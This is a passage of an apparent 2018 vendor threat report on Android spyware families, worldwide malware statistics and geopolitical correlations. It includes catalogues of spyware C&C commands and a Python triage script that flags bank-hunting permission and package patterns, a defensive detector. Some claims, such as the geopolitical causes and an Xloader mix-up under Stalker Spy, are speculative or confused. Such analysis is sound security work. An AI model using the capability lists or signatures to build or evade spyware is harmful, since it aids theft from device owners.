Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
Disguises of Stalker Spy (App Distribution): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption the malware deletes the original files. So we can call it a spy with a "007 license".
Disguises of Mystery Bot: Version 1: Adobe Flash Player; Version 2: Flash Player
Mystery Bot comes under cover of Adobe Flash Player. Below is the list of some commands that the malware can execute on your device:
Send_SMS — extract SMS content and send it to the C&C server
Send_USSD — send the USSD to the C&C server
Gethistory — monitor browser history
Start_AllApp — gather info about installed applications
Send_call — set the Intent action to call
Forward_call — forward incoming calls
ResForward_call — reset call forwarding
Go_Smsmnd — delete SMS content
Go_GetAlls — get SMS history
Dell_sms — delete SMS content in a conversation
Send_spam — send spam SMS
Start_Inject — call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks that you can see in the screenshot.
Disguises of FakeSpy: 佐川急便, 현대캐피탈
It collects available information from the infected device and sends it to C&C servers. Also it checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
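A static triage heuristic built on the report's Xloader and FakeSpy descriptions, as an added example that is not Comodo's tooling: a sample that hard-codes several rival banking package names alongside SMS, recording and call permissions matches the bank-hunting behaviour described above, while a genuine banking app references only itself. It assumes the Xloader package names with their dots restored (the report's text has them stripped); the DEX and APK blobs are constructed stand-ins.

```python
"""Static triage for Android bank-hunting spyware of the Xloader/FakeSpy type:
the samples carry a hard-coded list of the banking apps they look for, plus
the permissions behind the SMS/recording/call commands, and both appear as
plain strings in classes.dex. Added example, not Comodo's code."""
import io
import re
import zipfile
from dataclasses import dataclass

# Xloader's target list from the report, with package-name dots restored
# (the report's extraction stripped them) - treated here as an assumption.
XLOADER_BANK_TARGETS = frozenset({
    "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.ibk.neobanking",
    "com.sc.danb.scbankapp", "com.shinhan.sbanking",
    "com.hanabank.ebk.channel.android.hananbank", "nh.smart",
    "com.epost.psf.sdsi", "com.kftc.kjbsmb", "com.smg.spbs",
})

# Real Android permission strings matching the behaviours the report lists
# (monitor/delete/send SMS, make recordings, make calls, extract contacts).
SPY_PERMISSIONS = frozenset({
    "android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
    "android.permission.SEND_SMS", "android.permission.RECORD_AUDIO",
    "android.permission.CALL_PHONE", "android.permission.READ_CONTACTS",
})

# Printable-ASCII runs of 4+ bytes, the usual `strings`-style extraction.
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob: bytes) -> set[str]:
    """Return the distinct printable strings embedded in a binary blob."""
    return {m.group().decode("ascii") for m in STRING_RE.finditer(blob)}


@dataclass(frozen=True)
class Verdict:
    bank_targets: tuple[str, ...]   # banking packages the sample references
    permissions: tuple[str, ...]    # spy-capable permissions it names
    score: int
    suspicious: bool


def triage(dex_blob: bytes, bank_threshold: int = 3) -> Verdict:
    """Score a classes.dex blob: a legitimate banking app references its own
    package; one that enumerates several rival banks AND names SMS, recording
    or call permissions matches the report's Xloader pattern."""
    strings = extract_strings(dex_blob)
    banks = tuple(sorted(strings & XLOADER_BANK_TARGETS))
    perms = tuple(sorted(strings & SPY_PERMISSIONS))
    score = 2 * len(banks) + len(perms)
    suspicious = len(banks) >= bank_threshold and len(perms) > 0
    return Verdict(banks, perms, score, suspicious)


def triage_apk(apk) -> Verdict:
    """Pull classes.dex out of an APK (path or file-like object) and triage it."""
    with zipfile.ZipFile(apk) as zf:
        return triage(zf.read("classes.dex"))


def build_fake_dex(strings: list[str]) -> bytes:
    """Constructed stand-in for a DEX string table: entries separated by
    non-printable bytes so the regex sees them as distinct strings."""
    body = b"\x00\x7f".join(s.encode("ascii") for s in strings)
    return b"dex\n035\x00" + body + b"\x00"


def build_fake_apk(dex_blob: bytes) -> io.BytesIO:
    """Wrap a DEX blob in an in-memory zip so triage_apk() can be exercised."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", dex_blob)
    buf.seek(0)
    return buf


# Constructed samples: one mimicking the Xloader pattern, one a single-bank
# app that legitimately needs SMS for one-time codes.
MALICIOUS_DEX = build_fake_dex([
    "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.shinhan.sbanking",
    "nh.smart", "android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
    "android.permission.RECORD_AUDIO", "android.permission.CALL_PHONE",
    "Lcom/android/chrome/MainActivity;",   # Chrome-lookalike component name
])
BENIGN_DEX = build_fake_dex([
    "com.kbstar.kbbank", "android.permission.INTERNET",
    "android.permission.RECEIVE_SMS",
])

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_DEX), ("benign", BENIGN_DEX)):
        v = triage_apk(build_fake_apk(blob))
        print(f"{name}: suspicious={v.suspicious} score={v.score} banks={v.bank_targets}")
```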
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to get users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Disguises of RedAlert: Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; Version 2: Update Google Market, Flash Player, Tactic, FlashLight
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.
Disguises of Hero Rat (Version 1): CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Its code is available on the Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.
After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile billing. Once installed, this malware displays a fake notification with a "skip option". If you click this button, this malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in a variety of disguises, named below.
Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Disguises of CoinHive: Version 1: Netflix Hack, Instagram Hack; Version 2: TSF Launcher; Version 3: Android Service, PlacarTv Futebol Ao Vivo
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Chart: Android-targeted malware in April
4.2.2 May 2018
Chart: Android-targeted malware in May
4.2.3 June 2018
Chart: Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus, but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email, but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises, but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
1 Executive summary
1.1 Overview
• In Q2, Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
• The malware was detected in 237 countries' top-level domains.
• Russia, Turkey and India were the countries with the highest number of worm infections.
• The United Kingdom had the highest proportion of detected backdoors.
• Ukraine and Russia were the most common countries of detection for viruses.
• Germany was the #1 country hit by trojans.
1.2 New Trends
1.2.1 Trojans jumped to the top of the malware list
The most dangerous sign is the unfolding merger of trojans and phishing emails, which amplifies the spread of the malware. Attackers use trojans to deliver other malware, and the trojan surge accompanies a significant increase in other malware infections. As such, users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity.
1.2.2 Cryptominers evolved into multifunctional malware
Cryptomining decreased in quantity but grew in harmful capabilities. As events in Q2 demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antiviruses and root deeply in users' systems.
1.2.3 Android malware skyrocketed in variety
In Q2, the Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device represents a treasure trove of data. Spyware takes the lead among Android malware types. Like real-world spies, Android spyware constantly changes guises and methods of avoiding detection, and its harmful potential goes up with every new version.
1.2.4 Geopolitical intelligence
Cyberattacks and malware spikes are often correlated with significant events in world politics. Appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests and other events during Q2 2018 clearly demonstrate the existence of such correlations.
2 Trojans going on the offensive to hunt for confidential data
The second quarter of 2018 brought a sudden change in malware competition. Trojans squeezed out other malware types and jumped to the top of the charts. Gaining the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their appearance forces cybersecurity departments and individual users to update their defense tactics.
Malware Distribution by Type
Why are these changes inevitable?
Trojans are a special kind of malware. Their distinguishing feature is universality. They are most effective at providing a diversity of attacks: stealing data, implanting ransomware, adware or cryptominers, or even completely crashing systems.
Another special feature of trojans is covert activity. An owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.
Hence the need for a new approach to defense tactics. Let's have a closer look at the most active vicious players of the trojan team to understand in depth what harm they can do to your computers if they sneak inside.
Distribution of top 30 Malware Families
In this list of the 30 top malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.
For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. And the downloaded malware can be of any type.
Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website to infect users with other types of malware.
